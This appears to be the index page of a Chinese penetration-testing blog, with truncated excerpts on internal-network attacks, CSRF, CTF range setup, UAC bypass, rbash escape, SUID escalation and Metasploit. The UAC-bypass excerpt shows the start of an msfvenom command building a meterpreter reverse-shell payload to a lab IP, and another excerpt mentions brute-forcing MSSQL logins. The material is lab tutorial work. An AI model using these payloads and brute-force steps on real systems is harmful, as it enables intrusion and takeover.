Live My Life

Keep moving

内网渗透(一)

环境预设环境:攻击机Kali已通过代理进入内网 探测活动主机 使用netdiscover或nmap扫描主机 Kali自带的netdiscover是专用的二层发现工具,拥有主动和被动发现两种方式。 -i 指定网卡 -r 指定扫描范围 探测主机开放的端口和服务 攻击服务 mssql口令爆破 使用msfconsole的mssql_login模块爆破弱口令 爆破出弱口令 ......

CSRF攻击技术浅析

CSRF攻击技术浅析CSRF(Cross-site request forgery)跨站请求伪造,由客户端发起,是一种劫持受信任用户向服务器发送非预期请求的攻击方式,与XSS相似,但比XSS更难防范,常与XSS一起配合攻击 原理详解攻击者盗用了你的身份信息,以你的名义发送恶意请求,对服务器来说这个请求是你发起的,却完成了攻击者所期望的一个操作 漏洞危害修改用户信息,修改密码,以你的名义发......

搭建个人CTF动态靶场

前言根据网上的教程,用CTFd配合ctf-whale插件搭建一个动态靶机,有些踩坑的地方记录下来 官方教程https://www.zhaoj.in/read-6333.html 搭建环境 ubuntu18.04 docker19.03.12 docker-compose1.26.2 搭建步骤一、安装docker 方法一:使用官方脚本自动安装 1curl -fsSL https://......

绕过uac提权

绕过uac提权比较简单,做个步骤记录 1. 生成exe远控文件1234567msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.2.128 LPORT=4444 -b "\x00" -e x86/shikat......

IIS短文件名猜解

前提 IIS ASP.NET 短文件规则 只保留前六位,后续用~1表示 全部为大写 后缀最多显示三位,其余被截断 长文件名前缀或文件夹名字符长度符合0-9和Aa-Zz范围且需要大于等于9位才会生成短文件名,如果包含空格或者其他部分特殊字符,不论长度均会生成短文件 漏洞原理为了兼容16位MS-DOS程序,Windows为文件名较长的文件(和文件夹)生成了对应的windows 8.3 短文件......

rbash绕过

什么是rbash?先解释下什么是bash,bash是shell的一种,一种壳层与命令行界面,是Unix操作系统下传统的用户和计算机的交互界面。而rbash中,r for restricted,意思是受限制的bash,即该bash被管理员限制了部分命令,如whoami,su,cat等常用命令不能使用,从而降低被入侵的可能 rbash绕过即使受到了限制,也有方法绕过。通常是利用系统内的软件执行外......

Linux下SUID提权

什么是SUID? SUID 全称 Set User ID它是一种特殊权限,设置了suid的程序文件,在用户执行该程序时,用户的权限是该程序文件属主(拥有者)的权限。例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限。sgid与suid类似,只是执行程序时获得的是文件属组的权限。 文章:关于SUID与SGID的详解 SUID提权若当前用户为普通用户,而某文件拥有......

2020

Over-distracted energy,so that in the end,it seems that I have learned everything,but it seems that I have not learned anything.           &em......

Metasploit

Metasploit一个开源免费的攻击框架,集成了多种已知漏洞,可用于执行渗透测试的强大工具,具有良好的扩展性,通过它可以很容易地对计算机漏洞实施攻击。 全局设置通过全局设置不用每次攻击前都重复设置一些常用参数 使用setg命令进行全局设置 setg LHOST ip 设置本机攻击IP地址 setg LPORT port 设置本机监听端口 setg THREADS nu......
msf

反序列化学习

序列化和反序列化当程序创建对象时,对象会一直存在;当程序终止,对象则被销毁。如果能够保存程序运行时的对象信息,下次程序启动时,对该对象进行重建,并且与程序上次运行时所拥有的信息相同。而序列化就能完成这种操作。 序列化 (Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程,便于保存在内存、文件、数据库中。在序列化期间,对象将其当前状态写入到临时或持久性存储区。存入以......